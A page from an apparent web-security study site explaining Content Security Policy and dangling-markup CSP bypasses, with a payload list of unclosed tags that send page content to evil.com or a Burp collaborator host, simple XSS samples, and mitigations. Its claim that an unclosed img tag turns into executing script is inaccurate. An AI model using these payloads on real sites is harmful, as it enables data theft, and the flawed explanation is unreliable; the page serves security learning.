Sec-88
  • 🧑Whoami
  • 🕸️Web-AppSec
    • Features Abuse
      • 2FA
      • Ban Feature
      • CAPTCHA
      • Commenting
      • Contact us
      • File-Upload
      • Inviting Feature
      • Messaging Features
      • Money-Related Features
      • Newsletter
      • Profile - Settings
      • Registration
      • Reset Password
      • Review
      • Rich Editor/Text
      • Social Sharing
      • Billing-Shipping Address Management
      • Integrations - Webhooks
      • API Key Management
    • Reconnaissance
      • Attacking Organizations with big scopes
    • Subdomain Enumeration
    • Fingerprinting
    • Dorking
    • XSS-HTML Injection
    • Improper Authentication
      • JWT Security
    • OAUTH Misconfigurations
      • OAuth 2.0 Basics
      • OAUTH Misconfigurations
    • Auth0 Misconfigurations
    • Broken Access Control
      • Insecure Direct Object References (IDOR)
      • 403 Bypass
    • Broken Link Injection
    • Command Injection
    • CORS
    • CRLF
    • CSRF
    • Host Header Attacks
    • HTTP request smuggling
    • JSON Request Testing
    • LFI
      • LFI to RCE
    • No Rate Limit
    • Parameters Manual Testing
    • Open Redirect
    • Registration & Takeover Bugs
    • Remote Code Execution (RCE)
    • Session Fixation
    • SQL Injection
      • SQL To RCE
    • SSRF
    • SSTI
    • Subdomain Takeover
    • Web Caching Vulnerabilities
    • WebSockets
    • XXE
      • XXE to RCE
    • Cookie Based Attacks
    • CMS
      • AEM [Adobe CMS]
    • XSSI (Cross Site Script Inclusion)
    • NoSQL injection
    • Local VS Remote Session Fixation
    • Protection
      • Security Mechanisms for Websites
      • Cookie Flags
      • SameSite Cookie Restrictions
      • Same-origin policy (SOP)
      • CSP
    • Hacking IIS Applications
    • Dependency Confusion
    • Attacking Secondary Context
    • Hacking Web Sockets
    • IDN Homograph Attack
    • DNS Rebinding Attack
    • LLM Hacking Checklist
    • Bypass URL Filtration
    • Cross-Site Path Traversal (CSPT)
    • PostMessage Security
    • Prototype Pollution
      • Client-Side Prototype Pollution
      • Server-Side prototype pollution
    • Tools-Extensions-Bookmarks
    • WAF Bypassing Techniques
    • SSL/TLS Certificate Lifecycle
    • Serialization in .NET
    • Client-Side Attacks
      • JavaScript Analysis
    • Bug Bounty Platforms/Programs
  • ✉️API-Sec
    • GraphQL API Security Testing
      • The Basics
      • GraphQL Communication
      • Setting Up a Vulnerable GraphQL Server
      • GraphQL Hacking Tools
      • GraphQL Attack Surface
      • RECONNAISSANCE
      • GraphQL DOS
      • Information Disclosure
      • AUTHENTICATION AND AUTHORIZATION BYPASSES
      • Injection Vulnerabilities in GraphQL
      • REQUEST FORGERY AND HIJACKING
      • VULNERABILITIES, REPORTS AND EXPLOITS
      • GraphQL Hacking Checklist
    • API Recon
    • API Token Attacks
    • Broken Object Level Authorization (BOLA)
    • Broken Authentication
    • Evasive Maneuvers
    • Improper Assets Management
    • Mass Assignment Attacks
    • SSRF
    • Injection Vulnerabilities
    • Excessive Data Exposure
    • OWASP API TOP 10 MindMap
    • Scanning APIs with OWASP ZAP
  • 📱Android-AppSec
    • Setup Android App Pentesting environment on Arch
    • Setup Android App Pentesting environment on Mac M4
    • Setup Android Pentesting Environment on Debian Linux
    • Android App Fundamentals
      • Android Architecture
      • Android Security Model
      • Android App Components
        • Intents
        • Pending Intents
    • Android App Components Security Cheatsheet
    • Android App Pentesting Checklist
    • How To Get APK file for application
    • ADB Commands
    • APK structure
    • Android Permissions
    • Exported Activity Hacking
    • BroadcastReceiver Hacking
    • Content Provider Hacking
    • Signing the APK
    • Reverse Engineering APK
    • Deep Links Hacking
    • Drozer Cheat Sheet
    • SMALI
      • SMALI Cheat Sheet
      • Smali Code Patching Guide
    • Intent Redirection Vulnerability
    • Janus Vulnerability (CVE-2017-13156)
    • Task Hijacking
    • Hacking Labs
      • Injured Android
      • Hacking the VulnWebView Lab
      • Hacking InsecureBankv2 App
    • Frida Cheat Sheet
  • 📶Network-Sec
    • Networking Fundamentals
    • Open Ports Security Testing
    • Vulnerability Scanning
    • Client Side Attacks
    • Port Redirection and Tunneling
    • Password Attacks
    • Privilege Escalation [PrevEsc]
      • Linux Privilege Escalation
    • Buffer Overflow (BOF)
      • VulnServer
      • Sync Breez Enterprize
      • Crashed CTF
      • BOF for Linux
    • AV Evasion
    • Post Exploitation
      • File Transfer
      • Maintaining Access
      • Pivoting
      • Clean Up
    • Active Directory
      • Basic AD Pentesting
  • 💻Desktop AppSec
    • Thin Client vs. Thick Client
  • ☁️Cloud Sec
    • Salesforce Hacking
      • Basics
      • Salesforce SAAS Apps Hacking
    • Firebase
    • S3 Buckets Misconfigurations
  • 👨‍💻Programming
    • HTML
    • JavaScript (JS)
      • window.location object
    • Python
      • Python Tips
      • Set
        • SetMethods
    • JAVA
      • Java Essentials
      • Java Essentials Code Notes
      • Java OOP1
      • JAVA OOP Principles
        • Inheritance
        • Method Overriding
        • Abstract Class
        • Interface
        • polymorphism
        • Encapsulation
        • Composition
      • Java OOP Challenges
      • Exception Handling
    • Go
      • Go Syntax Tutorial in one file
      • Methods and Interfaces
      • Go Slices
      • Go Maps
      • Go Functions
      • Concurrency
      • Read Files
      • Write Files
      • Package
        • How to make personal Package
        • regexp Packages
        • Json
        • bufio
        • Time
      • Signals-Exit
      • Unit Testing
  • 🖥️Operating Systems
    • Linux
      • Linux Commands
      • Tools
      • Linux File System
      • Bash Scripting guide
      • tmux
      • Git
      • Install Go tools from private repositories using GitHub PAT
    • VPS
    • Burp Suite
  • ✍️Write-Ups
    • Hunting Methodology
    • API BAC leads to PII Data Disclosure
    • Misconfigured OATUH leads to Pre-Account Takeover
    • Automating Bug Bounty with GitHub Actions
    • From Recon to Reward: My Bug Bounty Methodology when Hunting on Public Bug Bounty Programs
    • Exploring Subdomains: From Enumeration to Takeover Victory
    • 0-Click Account Takeover via Insecure Password Reset Feature
    • How a Simple Click Can Lead to Account Takeover: An OAuth Insecure Implementation Vulnerability
    • The Power Of IDOR even if it is unpredictable IDs
    • Unlocking the Weak Spot: Exploiting Insecure Password Reset Tokens
    • AI Under Siege: Discovering and Exploiting Vulnerabilities
    • Inside the Classroom: How We Hacked Our Way Past Authorization on a Leading EdTech Platform
    • How We Secured Our Client’s Platform Against Interaction-Free Account Thefts
    • Unchecked Privileges: The Hidden Risk of Role Escalation in Collaborative Platforms
    • Decoding Server Behavior: The Key to Mass Account Takeover
    • Exploiting JSON-Based CSRF: The Hidden Threat in Profile Management
    • How We Turned a Medium XSS into a High Bounty by Bypassing HttpOnly Cookie
Powered by GitBook
On this page
  • What is CSP?
  • CSP Bypass using Dangling Markup
  • How Dangling Markup Works:
  • Example of a Dangling Markup Bypass:
  • Why CSP Doesn't Prevent This:
  • Other CSP Bypass Techniques:
  • Mitigating Dangling Markup:
  • Reference

Was this helpful?

Edit on GitHub
  1. Web-AppSec
  2. Protection

CSP

What is CSP?

Content Security Policy (CSP) is a security feature that helps mitigate certain types of attacks like Cross-Site Scripting (XSS), clickjacking, and other code injection attacks by defining which resources are allowed to be loaded and executed on a webpage.

CSP is a header or meta tag that instructs the browser on how to handle content loading. It can restrict:

  • Scripts (script-src): Controls the execution of JavaScript.

  • Styles (style-src): Restricts the loading of CSS.

  • Images (img-src): Controls from where images can be loaded.

  • Frames (frame-src): Defines from where iframes can be loaded.

An example of a CSP header:

Content-Security-Policy: default-src 'self'; script-src 'self' https://trusted.com; object-src 'none';

CSP Bypass using Dangling Markup

A dangling markup attack is a way to bypass CSP and inject malicious code by exploiting incomplete or unclosed HTML tags in the source of a vulnerable webpage. This type of attack takes advantage of how browsers handle incomplete or "dangling" HTML structures, which can lead to executing malicious scripts without triggering CSP protections.

How Dangling Markup Works:

When CSP is configured on a site, it typically blocks unauthorized scripts or inline script execution. However, if the HTML structure is improperly closed or certain elements (like <script> tags) are injected but not properly finished, an attacker can manipulate the DOM to execute their payload.

Example of a Dangling Markup Bypass:

  1. Incomplete Tag Injection: Let's say an attacker finds a vulnerability where they can inject a dangling tag, such as an incomplete <script> or <img> tag, in a URL or form field.

  2. Inserting Unfinished HTML: The attacker injects a partially constructed tag that the browser tries to complete:

    <img src="http://malicious.com/evil.jpg"

    This HTML is injected without closing the tag properly. If the target application does not sanitize the input correctly, the browser may treat it as part of the page and attempt to complete it.

  3. JavaScript Execution: When the browser encounters the unclosed <img> tag, it might attempt to complete the tag automatically, leading to potential XSS or script execution:

    <img src="http://malicious.com/evil.jpg"><script>alert(1)</script>

    The attacker can now execute JavaScript even though the CSP is in place, as the incomplete tag led to unintentional DOM manipulation and script injection.

Payloads

<img src='http://evil.com/log.cgi?
<meta http-equiv="refresh" content='0; url=http://evil.com/log.php?text=
<meta http-equiv="refresh" content='0;URL=ftp://evil.com?a=
<table background='//your-collaborator-id.burpcollaborator.net?'
<base href='http://evil.com/'>
<button name=xss type=submit formaction='https://google.com'>I get consumed!
<form action=http://google.com><input type="submit">Click Me</input><select name=xss><option

Why CSP Doesn't Prevent This:

  • Inline JavaScript: If CSP is configured to block inline JavaScript using script-src 'self'; or script-src 'nonce-*';, it expects inline scripts to either be completely blocked or validated by a nonce value. But, with dangling markup, the injection happens in such a way that the browser may consider it a part of legitimate HTML content, inadvertently executing the script.

  • DOM-Based Attacks: Since this technique leverages DOM manipulation, it sidesteps traditional CSP directives by causing browser-level interpretation of incomplete HTML.

Other CSP Bypass Techniques:

  • JSONP Hijacking: If CSP allows external script sources (script-src includes a trusted external domain), JSONP endpoints on those trusted domains can be exploited to bypass the policy by injecting JavaScript.

  • Inline Event Handlers: If CSP is misconfigured to allow inline JavaScript, event handlers like onclick or onload attributes can still lead to XSS:

    <img src="x" onerror="alert(1)">

  • Nonces and Hashes Misconfigurations: If a CSP uses nonces or hashes to validate inline scripts but is improperly configured (e.g., reusing nonces across pages or allowing unsafe hashes), attackers may exploit this to run their own code.

Mitigating Dangling Markup:

To prevent dangling markup attacks, developers must:

  • Properly sanitize and validate input: Ensure all user-supplied data is sanitized to prevent injection of incomplete tags or dangerous payloads.

  • Correctly configure CSP: Ensure CSP is correctly enforced with strong rules, such as avoiding inline scripts or using strict script-src policies.

  • Close all HTML tags properly: Ensure the HTML structure of the page is always well-formed and complete, so browsers don't attempt to "auto-fix" dangling or incomplete tags.

Reference

PreviousSame-origin policy (SOP)NextHacking IIS Applications

Last updated 7 months ago

Was this helpful?

🕸️
Evading CSP with DOM-based dangling markupPortSwigger Research
Logo